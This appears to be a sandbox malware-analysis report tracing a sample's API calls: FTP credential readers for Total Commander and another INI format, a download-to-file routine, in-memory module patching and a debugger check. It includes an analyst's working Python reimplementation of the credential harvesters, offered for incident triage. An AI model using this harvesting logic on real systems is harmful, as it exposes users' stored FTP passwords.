• HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09  [HEAP_ZERO_MEMORY, 0x20002 bytes: sized for the 0xFFFF-WCHAR buffer passed to the next call. The 0x104 (MAX_PATH) and the registry key string still on the stack are consistent with the INI path having just been resolved from SOFTWARE\Ghisler\Total Commander by the preceding function (API ID CloseQueryValue)]
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C  [lpAppName and lpKeyName both NULL: returns every section name of the INI file, NUL-separated, into a 0xFFFF-WCHAR buffer; this list is what the loop below walks]
• HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
• StrStrIW.SHLWAPI(?,?), ref: 00403ACF
• StrStrIW.SHLWAPI(?,?), ref: 00403AE4  [two case-insensitive substring tests on each section name; per the control-flow graph a hit on either returns to the loop head. Of the string constants referenced by this function, connections and default are the ones that fit: they are the bookkeeping entries of Total Commander's wcx_ftp.ini, not saved sites]
• GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
• GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
• GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36  [three per-section reads of up to 0xFF WCHARs, matching the keys host, username and password; a read that returns 0 characters branches back to the loop head, otherwise the values pass through 00403877 and are formatted with ftp://%s:%s@%s. Taken together this is a reader of the FTP logins Total Commander saves in wcx_ftp.ini]
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: PrivateProfileString$AllocHeap
• String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
• API String ID: 2479592106-2015850556
• Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
• Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
• Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
• Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

APIs
Argument lists in this report are stack snapshots taken at the call: values past the function's arity (for example the recurring 0040B182, 0040B320 and 0040B3E0 below, all inside the sample's image) are caller residue such as return addresses, not arguments.
  • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C  [HKEY_CURRENT_USER, KEY_QUERY_VALUE; this key holds the current sound for Explorer's "Start Navigation" event, the click played when a hosted WebBrowser control navigates]
  • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A  [HKEY_LOCAL_MACHINE, KEY_QUERY_VALUE]
• GetSystemMetrics.USER32(00000000), ref: 004032E5  [SM_CXSCREEN]
• GetSystemMetrics.USER32(00000001), ref: 004032ED  [SM_CYSCREEN]
• VirtualProtect.KERNEL32(76990B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309  [10 bytes set to PAGE_WRITECOPY (8) at an address outside the sample's own image (mapped at 00400000), i.e. inside a loaded module]
• VirtualProtect.KERNEL32(76990B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333  [protection restored; a writable window opened and closed around a module address is the footprint of an in-place patch of that module. The bytes written in between are not visible in this listing]
• SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A  [installs a top-level exception filter located in the sample's image]
• LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
• GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
• GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
• GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377  [ATL's ActiveX hosting API, resolved by name at run time rather than imported: AtlAxWinInit registers the AtlAxWin host window class, AtlAxAttachControl hosts a control in a window, AtlAxGetControl returns the hosted control's IUnknown]
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
• String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
• API String ID: 3066332896-2664446222
• Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
• Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
• Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
• Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
APIs
  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
• FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
• WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6  [timeout 0: polls a handle without blocking, once per entry]
• PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310  [wildcard filter on the entry name]
• Sleep.KERNEL32(00000000), ref: 00408342
• Sleep.KERNEL32(00000000), ref: 00408377
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
• FindClose.KERNEL32(00000000), ref: 004083B9  [FindFirstFileW / FindNextFileW / FindClose directory walk, throttled by the two Sleep calls between entries]
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
• String ID: .$.$.8@$.8@$@@
• API String ID: 2348139788-3828113974
• Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
• Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
• Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
• Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
APIs
  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C  [builds the path of the INI file read below]
• HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566  [HEAP_ZERO_MEMORY; the same 0x20002-byte section-list buffer as the Total Commander reader at 004039EA]
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A  [lpAppName and lpKeyName NULL: enumerate all section names]
• HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
• GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
• GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653  [nDefault 0x15 = 21, the FTP control port; port is the only integer-valued key among this function's strings]
• GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681  [two string reads per section, matching the keys user and pass, plus the integer port, formatted with ftp://%s:%s@%s:%u: a second saved-FTP-credential reader for a different INI layout. Which value supplies the host is not visible in the trace]
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: PrivateProfile$String$AllocHeap$CombinePath
• String ID: ftp://%s:%s@%s:%u$pass$port$user
• API String ID: 3432043379-2696999094
• Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
• Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
• Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
• Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
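The two INI readers above (the Total Commander routine at 004039EA with host/username/password and ftp://%s:%s@%s, and the routine at 00403566 with user/pass/port and ftp://%s:%s@%s:%u) reduce to one procedure: enumerate sections with a NULL section name, skip bookkeeping entries, read a fixed set of keys per section, format a URL. The Python below is an analyst's model of that procedure written for this page, not code recovered from the sample. It runs on constructed INI text embedded in the block. The skip on "connections"/"default" and the drop-on-empty-read follow the StrStrIW calls and the control-flow graph; GetPrivateProfileIntW semantics are approximated; the post-processing routine 00403877 is not reproduced; and taking the host of the second format from the section name is an assumption, since only user, pass and port reads are visible.

```python
"""Analyst model of the two INI credential readers traced above: the Total
Commander reader at 004039EA (host/username/password -> ftp://%s:%s@%s) and
the reader at 00403566 (user/pass/port -> ftp://%s:%s@%s:%u).  Added for this
page, not code recovered from the sample; key handling is inferred from the
API arguments, string IDs and control-flow graph."""
import re
from typing import Dict, List

# Constructed wcx_ftp.ini-style input, not captured from the sandbox run.
# Total Commander stores password= obfuscated; the sample's post-processing
# routine 00403877 is not modelled, so values are reported as written.
WCX_FTP_INI = """\
[connections]
default=corp-ftp
[corp-ftp]
host=ftp.example.test
username=alice
password="hunter2"
[Default site]
host=ignored.example.test
username=x
password=y
[backup]
username=svc_backup
"""

# Constructed input for the second reader.  Only user, pass and port reads
# are visible in the trace, so the host is taken from the section name here
# (an assumption; the real source of the host is not visible).
OTHER_FTP_INI = """\
[files.example.test]
user=bob
pass=s3cret
port=2221
[old.example.test]
user=carol
pass=letmein
; no port key: GetPrivateProfileIntW returns its default, 0x15 = 21
"""


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal reader with GetPrivateProfileString-style lookup: names match
    case-insensitively (stored lower-cased), a value in matching quotes is
    unquoted, ';' lines are comments, section order is kept (file order)."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        sections[current][key.strip().lower()] = value
    return sections


def profile_int(section: Dict[str, str], key: str, default: int) -> int:
    """GetPrivateProfileIntW approximation: missing key -> nDefault, else the
    value's leading decimal digits (0 if there are none)."""
    value = section.get(key)
    if value is None:
        return default
    digits = re.match(r"\s*(\d*)", value).group(1)
    return int(digits) if digits else 0


def harvest_total_commander(ini: Dict[str, Dict[str, str]]) -> List[str]:
    """004039EA: walk every section, skip names containing 'connections' or
    'default' (the two StrStrIW tests), read host, username and password,
    and drop the entry if any read comes back empty (each
    GetPrivateProfileStringW result branches back to the loop head on 0)."""
    urls: List[str] = []
    for name, kv in ini.items():
        if "connections" in name or "default" in name:
            continue
        host, user, pw = kv.get("host", ""), kv.get("username", ""), kv.get("password", "")
        if host and user and pw:
            urls.append("ftp://%s:%s@%s" % (user, pw, host))
    return urls


def harvest_user_pass_port(ini: Dict[str, Dict[str, str]]) -> List[str]:
    """00403566: per section read user and pass, port via the integer call
    with default 21, and format ftp://%s:%s@%s:%u (host: section name)."""
    urls: List[str] = []
    for name, kv in ini.items():
        user, pw = kv.get("user", ""), kv.get("pass", "")
        if user and pw:
            port = profile_int(kv, "port", 21)
            urls.append("ftp://%s:%s@%s:%u" % (user, pw, name, port))
    return urls
```

Call harvest_total_commander(parse_ini(WCX_FTP_INI)) and harvest_user_pass_port(parse_ini(OTHER_FTP_INI)) to see what each routine would lift from the constructed files. When triaging a machine that ran this sample, the same functions pointed at the real wcx_ftp.ini list exactly which saved logins were exposed (password values as stored, since 00403877 is not modelled), which is the set of credentials to rotate.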
APIs
• DeleteFileW.KERNEL32(00000000,76230F00), ref: 00407043
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D  [GENERIC_WRITE, no sharing, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL]
• GetLastError.KERNEL32(00000000), ref: 00407079
• SetEndOfFile.KERNEL32(00000000), ref: 0040708F  [truncates the freshly opened file to its current position]
• InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
• CloseHandle.KERNEL32(00000000), ref: 004070BB  [delete, recreate and truncate the target, then fetch a URL with WinINet: a download-to-file routine]
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3711279109-0
                                                                                                                                                                                                                • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                                • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: &condition_id=$&kwtype=$&real_refer=%s$&ref=%s$&ref=%s&real_refer=%s$0$0$0$0
                                                                                                                                                                                                                • API String ID: 0-2992689389
                                                                                                                                                                                                                • Opcode ID: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
                                                                                                                                                                                                                • Instruction ID: e592e17ffd072e5ed7288f56bd6294cd549ee2c695a1c784d027d9705cc039a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F1E272810118AADB14EB61DC919EF737EEF01304F5044BBFA09B62D1E7789E858F99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3777474486-0
                                                                                                                                                                                                                • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                                • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 004072E3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                                • String ID: c{@
                                                                                                                                                                                                                • API String ID: 3735792614-264719814
                                                                                                                                                                                                                • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                                • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                                • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetForegroundWindow.USER32(00427ED0,00427ED0,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A065
                                                                                                                                                                                                                • CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,00000001,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A07E
                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0040A088
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
• API ID: ForegroundWindow$CreateInstance
• String ID:
• API String ID: 2498160819-0
• Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
• Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
• Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
• Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25
APIs
• GetVersionExW.KERNEL32(?), ref: 00406CCF
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
• Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
• Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
• Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
• Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
• Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
• Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50

Control-flow Graph

control_flow_graph 129 402e3e-402e59 call 40d5b0 132 40327e-403286 129->132 133 402e5f-402e60 129->133 134 402e61-402ea5 call 40586b call 4058fb 133->134 139 402eb4 134->139 140 402ea7-402ead 134->140 142 402eb7-402ecb GetModuleFileNameW 139->142 140->139 141 402eaf-402eb2 140->141 141->142 143 402ed6-402edc GetCurrentDirectoryW 142->143 144 402ecd-402ed4 call 406cf9 142->144 146 402ee2-402f14 call 405511 call 4054ed * 2 143->146 144->146 154 402f16-402f22 call 405467 146->154 155 402f2a-402f94 GetLastError call 40a786 call 407552 call 405511 call 40584d 146->155 154->155 160 402f24 154->160 167 402f96-402fa6 155->167 168 402fa8 call 4056f9 155->168 160->155 169 402fad-402fd8 call 4054ed * 2 call 40584d 167->169 168->169 177 402fda-402fea 169->177 178 402fec call 4056f9 169->178 179 402ff1-403038 call 4054ed * 2 call 405511 call 4054ed 177->179 178->179 189 40303a-40304a 179->189 190 40304c call 4056f9 179->190 191 403051-403081 call 4054ed * 3 call 40584d 189->191 190->191 201 403083-403093 191->201 202 403095-40309b call 4056f9 191->202 203 4030a0-403132 call 405451 call 406d42 call 405511 call 4054ed * 4 call 40253c 201->203 202->203 221 403251-40325f GetLastError 203->221 222 403138-40313e 203->222 225 403262-403276 call 40a786 221->225 223 403144-403148 222->223 224 40322d-403235 222->224 223->224 228 40314e-403186 call 40584d call 407552 call 405511 call 40584d 223->228 226 403241 224->226 227 403237-40323f GetLastError 224->227 225->134 234 40327c-40327d 225->234 230 403244-40324f 226->230 227->230 241 403188-403198 228->241 242 40319a call 4056f9 228->242 230->225 234->132 243 40319f-4031c8 call 4054ed * 2 call 40584d 241->243 242->243 251 4031ca-4031da 243->251 252 4031dc call 4056f9 243->252 253 4031e1-403228 call 4054ed * 2 call 40253c 251->253 252->253 253->221 261 40322a 253->261 261->224
APIs
  • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
• GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
• GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
• GetLastError.KERNEL32(?), ref: 00402F4E
• GetLastError.KERNEL32 ref: 00403237
